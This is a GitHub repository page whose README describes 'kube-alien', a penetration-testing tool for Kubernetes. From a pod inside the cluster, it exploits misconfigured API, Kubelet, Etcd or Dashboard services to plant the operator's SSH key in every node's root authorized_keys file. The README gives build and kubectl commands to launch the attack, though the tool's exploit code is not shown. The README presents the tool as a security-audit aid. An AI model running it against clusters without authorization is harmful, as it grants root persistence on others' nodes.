Skip to content

nixwizard/kube-alien

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
templates
 
 
Dockerfile
 
 
README.md
 
 
config.py
 
 
main.py
 
 
Kube-alien Usage The following resources helped me a lot in creating this tool

README.md

Kube-alien

This tool launches attack on k8s cluster from within. That means you already need to have an access with permission to deploy pods in a cluster to run it. After running the kube-alien pod it tries to takeover cluster's nodes by adding your public key to node's /root/.ssh/authorized_keys file by using this image https://github.com/nixwizard/dockercloud-authorizedkeys (Can be adjusted using ADD_AUTHKEYS_IMAGE param in config.py) forked from docker/dockercloud-authorizedkeys. The attack succeedes if there is a misconfiguration in one of the cluster's components it goes along the following vectors:

  • Kubernetes API
  • Kubelet service
  • Etcd service
  • Kubernetes-Dashboard

What is the purpose of this tool?

  • While doing security audit of a k8s cluster one can quickly assess it's security posture.
  • Partical demostration of the mentioned attack vectors exploitation.

How can k8s cluster be attacked from within in a real life?

  • RCE or SSRF vunerability in an app which is being run in one of your cluster's pods.

Usage

Kube-alien image should be pushed to your dockerhub(or other registry) before using with this tool.

git clone https://github.com/nixwizard/kube-alien.git
cd kube-alien
docker build -t ka ./
docker tag ka YOUR_DOCKERHUB_ACCOUNT/kube-alien
docker push YOUR_DOCKERHUB_ACCOUNT/kube-alien

The AUTHORIZED_KEYS env required to be set to the value of your ssh public key, in case of success the public key will be added to all node's root's authorized_keys file.

kubectl run --image=YOUR_DOCKERHUB_ACCOUNT/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

or you may use my image for quick testing purpose:

kubectl run --image=nixwizard/kube-alien kube-alien --env="AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)" --restart Never

Check Kube-alien pod's logs to see if attack was successful:

kubectl logs $(kubectl get pods| grep alien|cut -f1 -d' ')

The following resources helped me a lot in creating this tool

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

25 stars

Watchers

2 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages